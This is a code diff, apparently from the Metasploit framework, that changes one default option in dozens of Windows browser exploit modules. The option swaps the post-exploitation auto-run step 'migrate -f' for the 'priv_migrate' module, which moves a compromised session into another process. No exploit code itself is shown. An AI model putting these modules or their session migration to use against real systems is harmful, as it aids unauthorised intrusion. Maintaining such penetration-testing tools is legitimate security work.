--- a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'EXITFUNC'          => 'process',
           'HTTP::compression' => 'gzip',
           'HTTP::chunked'     => true,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
index cab570badc..1df3b951d3 100644
--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC'         => "process",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
index 325a1669b1..bbb6dc6312 100644
--- a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'EXITFUNC'          => 'process',
           'HTTP::compression' => 'gzip',
           'HTTP::chunked'     => true,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb
index d27e4c3fdd..ff232b7c98 100644
--- a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb
+++ b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
index 6e83a0298d..3c521b78fa 100644
--- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
+++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'      =>
         {
           'Retries'              => false,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'BrowserRequirements' =>
         {
diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
index ab8329aab8..56e2aa86f0 100644
--- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
+++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'BrowserRequirements' =>
diff --git a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb
index 7432c5f21f..db438aa329 100644
--- a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
index da040e12fd..b9090e0eb1 100644
--- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
index c7f952df5b..c96a2f1133 100644
--- a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Privileged'     => false,
       'DisclosureDate' => "May 22 2013"
diff --git a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
index 0e8c2c5918..c3c7b99591 100644
--- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
index ec9ff0db78..fad9da943f 100644
--- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
index 19c103ab84..39ab4c48ff 100644
--- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
+++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'         => "seh",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/aventail_epi_activex.rb b/modules/exploits/windows/browser/aventail_epi_activex.rb
index 29a01fdafe..fb643ab937 100644
--- a/modules/exploits/windows/browser/aventail_epi_activex.rb
+++ b/modules/exploits/windows/browser/aventail_epi_activex.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
index f883eb72e4..9264fdf53f 100644
--- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
+++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
index 9936fc912d..5a80c34faf 100644
--- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
+++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC'         => "none",
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
index 5b35ecdef3..d24e3c83b8 100644
--- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
index 199c27944b..b993fccb3d 100644
--- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb
index 58182c0a10..cb68bd0b8a 100644
--- a/modules/exploits/windows/browser/citrix_gateway_actx.rb
+++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/clear_quest_cqole.rb b/modules/exploits/windows/browser/clear_quest_cqole.rb
index affe99692b..99619cbf7d 100644
--- a/modules/exploits/windows/browser/clear_quest_cqole.rb
+++ b/modules/exploits/windows/browser/clear_quest_cqole.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
index 44636c8495..bb65ed47cb 100644
--- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
+++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb
index f70773b7a5..28eede199f 100644
--- a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb
+++ b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'         => "seh",
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
index 0333976af5..084dd3a5f4 100644
--- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
+++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/firefox_smil_uaf.rb b/modules/exploits/windows/browser/firefox_smil_uaf.rb
index 3031bde126..9817cee35e 100644
--- a/modules/exploits/windows/browser/firefox_smil_uaf.rb
+++ b/modules/exploits/windows/browser/firefox_smil_uaf.rb
@@ -45,7 +45,7 @@ require 'msf/core'
           'DefaultOptions'  =>
           {
             'EXITFUNC' => "thread",
-            'InitialAutoRunScript' => 'migrate -f'
+            'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
           },
           'References'     =>
             [
diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
index 5f083c52da..2ecf38c827 100644
--- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
+++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => "process",
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
index 34a7758163..ef7ce99038 100644
--- a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f -k'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
index efa03912ab..bdf8a7c485 100644
--- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
+++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb
index d6cbb5275a..f0bcacc5eb 100644
--- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb
+++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb
index 9cb5e338c4..d75ca8fa88 100644
--- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb
+++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb
index 873b2b876d..ca2baf3818 100644
--- a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb
+++ b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
index 76261ed22b..b0c226aeaf 100644
--- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
+++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
index 1f261d420a..c67ae31f3e 100644
--- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
+++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
index e002ede87f..97cfd3c741 100644
--- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
index d00bae6af6..8f7909a73f 100644
--- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
index bad5533df1..3656eee408 100644
--- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb
+++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
index 6c8d41af0e..bf8c48a15b 100644
--- a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
+++ b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'PrependMigrate'       => true,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Privileged'     => false,
       'DisclosureDate' => "Sep 17 2013",
diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
index 26459acef3..2cd1945cde 100644
--- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
+++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'EXITFUNC' => 'process',
           'DisablePayloadHandler' => false,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
index 0a0583a308..588c0e68e6 100644
--- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
+++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
index 66e44e1579..5251bad151 100644
--- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
+++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/intrust_annotatex_add.rb b/modules/exploits/windows/browser/intrust_annotatex_add.rb
index 3f626ef961..17035dd842 100644
--- a/modules/exploits/windows/browser/intrust_annotatex_add.rb
+++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/java_docbase_bof.rb b/modules/exploits/windows/browser/java_docbase_bof.rb
index c8a8cbcec7..625f2b8f50 100644
--- a/modules/exploits/windows/browser/java_docbase_bof.rb
+++ b/modules/exploits/windows/browser/java_docbase_bof.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/java_mixer_sequencer.rb b/modules/exploits/windows/browser/java_mixer_sequencer.rb
index 5817b6720e..c2983fb3ef 100644
--- a/modules/exploits/windows/browser/java_mixer_sequencer.rb
+++ b/modules/exploits/windows/browser/java_mixer_sequencer.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'             => "process",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/mcafee_mvt_exec.rb b/modules/exploits/windows/browser/mcafee_mvt_exec.rb
index eca4fd4e7d..b72351ea5b 100644
--- a/modules/exploits/windows/browser/mcafee_mvt_exec.rb
+++ b/modules/exploits/windows/browser/mcafee_mvt_exec.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'         => "none",
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/mozilla_attribchildremoved.rb b/modules/exploits/windows/browser/mozilla_attribchildremoved.rb
index e431231c46..11b8a375cd 100644
--- a/modules/exploits/windows/browser/mozilla_attribchildremoved.rb
+++ b/modules/exploits/windows/browser/mozilla_attribchildremoved.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb
index 635d5fc3be..eee4ff70b9 100644
--- a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb
+++ b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb
index be9b94bf4a..8c4e458121 100644
--- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb
+++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb
index 351ab5261d..9523c605da 100644
--- a/modules/exploits/windows/browser/mozilla_mchannel.rb
+++ b/modules/exploits/windows/browser/mozilla_mchannel.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/mozilla_nssvgvalue.rb b/modules/exploits/windows/browser/mozilla_nssvgvalue.rb
index 6b09d042d0..b0da5742b1 100644
--- a/modules/exploits/windows/browser/mozilla_nssvgvalue.rb
+++ b/modules/exploits/windows/browser/mozilla_nssvgvalue.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/mozilla_nstreerange.rb b/modules/exploits/windows/browser/mozilla_nstreerange.rb
index 46ba71e46e..74a5f98f0f 100644
--- a/modules/exploits/windows/browser/mozilla_nstreerange.rb
+++ b/modules/exploits/windows/browser/mozilla_nstreerange.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'thread', # graceful exit if run in separate thread
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb
index 2a78db1bb5..1e3d030aa6 100644
--- a/modules/exploits/windows/browser/mozilla_reduceright.rb
+++ b/modules/exploits/windows/browser/mozilla_reduceright.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => "process",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ms05_054_onload.rb b/modules/exploits/windows/browser/ms05_054_onload.rb
index 9027e3b800..29b047312a 100644
--- a/modules/exploits/windows/browser/ms05_054_onload.rb
+++ b/modules/exploits/windows/browser/ms05_054_onload.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
